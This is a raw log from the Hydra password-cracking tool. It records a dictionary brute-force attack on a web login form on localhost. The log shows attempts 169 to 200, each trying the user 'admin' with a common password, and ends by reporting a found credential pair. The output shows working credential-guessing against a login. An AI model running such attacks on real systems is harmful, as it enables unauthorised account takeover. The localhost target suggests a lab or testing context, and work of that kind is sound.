[ATTEMPT] target localhost - login "admin" - pass "football" - 169 of 1717 [child 6] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "11111" - 170 of 1717 [child 8] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "777777" - 171 of 1717 [child 11] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "1234qwer" - 172 of 1717 [child 5] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "999999" - 173 of 1717 [child 9] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "j38ifUbn" - 174 of 1717 [child 13] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "monkey1" - 175 of 1717 [child 14] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "football1" - 176 of 1717 [child 15] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "daniel" - 177 of 1717 [child 1] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "azerty" - 178 of 1717 [child 7] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "a12345" - 179 of 1717 [child 2] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "123456789a" - 180 of 1717 [child 0] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "789456" - 181 of 1717 [child 12] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "asdfgh" - 182 of 1717 [child 10] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "love123" - 183 of 1717 [child 3] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "abcd1234" - 184 of 1717 [child 4] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "jordan23" - 185 of 1717 [child 6] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "88888888" - 186 of 1717 [child 8] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "12345admin" - 187 of 1717 [child 5] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "5201314" - 188 of 1717 [child 9] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "12qwaszx" - 189 of 1717 [child 11] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "FQRG7CS493" - 190 of 1717 [child 13] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "ashley" - 191 of 1717 [child 14] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "asdf" - 192 of 1717 [child 15] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "asd123" - 193 of 1717 [child 1] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "superman" - 194 of 1717 [child 7] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "jessica" - 195 of 1717 [child 2] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "love" - 196 of 1717 [child 0] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "samsung" - 197 of 1717 [child 12] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "shadow" - 198 of 1717 [child 10] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "blink182" - 199 of 1717 [child 3] (0/0)
[ATTEMPT] target localhost - login "admin" - pass "333333" - 200 of 1717 [child 4] (0/0)
[8000][http-post-form] host: localhost   login: admin   password: 12345admin
[STATUS] attack finished for localhost (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-12-04 04:01:04

